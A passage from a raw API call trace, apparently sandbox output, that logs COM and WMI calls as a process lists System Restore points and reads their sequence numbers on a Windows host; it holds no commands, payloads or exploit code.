plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.850] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x70 [0122.850] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x70 [0122.850] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.850] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.851] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.851] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.851] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024910) returned 0x0 [0122.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.851] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60256f0) returned 0x0 [0122.851] WbemDefPath:IUnknown:Release (This=0x6024910) returned 0x0 [0122.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60256f0) returned 0x0 [0122.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.852] WbemDefPath:IUnknown:AddRef (This=0x60256f0) returned 0x3 [0122.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1758) returned 0x0 [0122.852] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1758, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.852] WbemDefPath:IUnknown:Release (This=0xbe1758) returned 0x3 [0122.852] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.852] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.852] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x2 [0122.852] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x1 [0122.852] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.852] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60256f0) returned 0x0 [0122.852] WbemDefPath:IUnknown:AddRef (This=0x60256f0) returned 0x3 [0122.852] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x2 [0122.852] WbemDefPath:IWbemPath:SetText (This=0x60256f0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x0 [0122.852] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.852] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.852] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.852] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.853] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.853] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.853] IWbemClassObject:Get (in: This=0x6027cb8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a4d08*=0, plFlavor=0x38a4d0c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), pType=0x38a4d08*=19, plFlavor=0x38a4d0c*=0) returned 0x0 [0122.853] IWbemClassObject:Get (in: This=0x6027cb8, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a4d08*=19, plFlavor=0x38a4d0c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), pType=0x38a4d08*=19, plFlavor=0x38a4d0c*=0) returned 0x0 [0122.853] CoTaskMemAlloc (cb=0x4) returned 0xbe1798 [0122.853] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1798, puReturned=0x389bfe4 | out: apObjects=0xbe1798*=0x6027e50, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027e50) returned 0x0 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.854] IUnknown:AddRef (This=0x6027e50) returned 0x3 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6027e54) returned 0x0 [0122.854] IMarshal:GetUnmarshalClass (in: This=0x6027e54, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.854] IUnknown:Release (This=0x6027e54) returned 0x3 [0122.854] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.854] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.854] IUnknown:Release (This=0x6027e50) returned 0x2 [0122.854] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.854] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.854] IUnknown:QueryInterface (in: This=0x6027e50, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027e50) returned 0x0 [0122.854] IUnknown:AddRef (This=0x6027e50) returned 0x4 [0122.854] IUnknown:Release (This=0x6027e50) returned 0x3 [0122.854] IUnknown:Release (This=0x6027e50) returned 0x2 [0122.854] CoTaskMemFree (pv=0xbe1798) [0122.854] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.854] IUnknown:AddRef (This=0x6027e50) returned 0x3 [0122.855] IWbemClassObject:Get (in: This=0x6027e50, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.855] IWbemClassObject:Get (in: This=0x6027e50, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.855] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x70 [0122.855] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x70 [0122.855] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.855] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.855] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.855] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.856] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024920) returned 0x0 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024920, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.856] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024920, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025760) returned 0x0 [0122.856] WbemDefPath:IUnknown:Release (This=0x6024920) returned 0x0 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025760) returned 0x0 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.856] WbemDefPath:IUnknown:AddRef (This=0x6025760) returned 0x3 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1798) returned 0x0 [0122.856] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1798, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.856] WbemDefPath:IUnknown:Release (This=0xbe1798) returned 0x3 [0122.856] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.856] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.856] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x2 [0122.856] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x1 [0122.856] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.856] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025760, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025760) returned 0x0 [0122.856] WbemDefPath:IUnknown:AddRef (This=0x6025760) returned 0x3 [0122.856] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x2 [0122.857] WbemDefPath:IWbemPath:SetText (This=0x6025760, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.857] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.857] IWbemClassObject:Get (in: This=0x6027e50, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a5558*=0, plFlavor=0x38a555c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), pType=0x38a5558*=19, plFlavor=0x38a555c*=0) returned 0x0 [0122.857] IWbemClassObject:Get (in: This=0x6027e50, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a5558*=19, plFlavor=0x38a555c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), pType=0x38a5558*=19, plFlavor=0x38a555c*=0) returned 0x0 [0122.857] CoTaskMemAlloc (cb=0x4) returned 0xbe17d8 [0122.857] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe17d8, puReturned=0x389bfe4 | out: apObjects=0xbe17d8*=0x6027fe8, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027fe8) returned 0x0 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.858] IUnknown:AddRef (This=0x6027fe8) returned 0x3 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6027fec) returned 0x0 [0122.858] IMarshal:GetUnmarshalClass (in: This=0x6027fec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.858] IUnknown:Release (This=0x6027fec) returned 0x3 [0122.858] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.858] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.858] IUnknown:Release (This=0x6027fe8) returned 0x2 [0122.858] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.858] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.858] IUnknown:QueryInterface (in: This=0x6027fe8, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027fe8) returned 0x0 [0122.858] IUnknown:AddRef (This=0x6027fe8) returned 0x4 [0122.858] IUnknown:Release (This=0x6027fe8) returned 0x3 [0122.858] IUnknown:Release (This=0x6027fe8) returned 0x2 [0122.859] CoTaskMemFree (pv=0xbe17d8) [0122.859] CoGetContextToken (in: 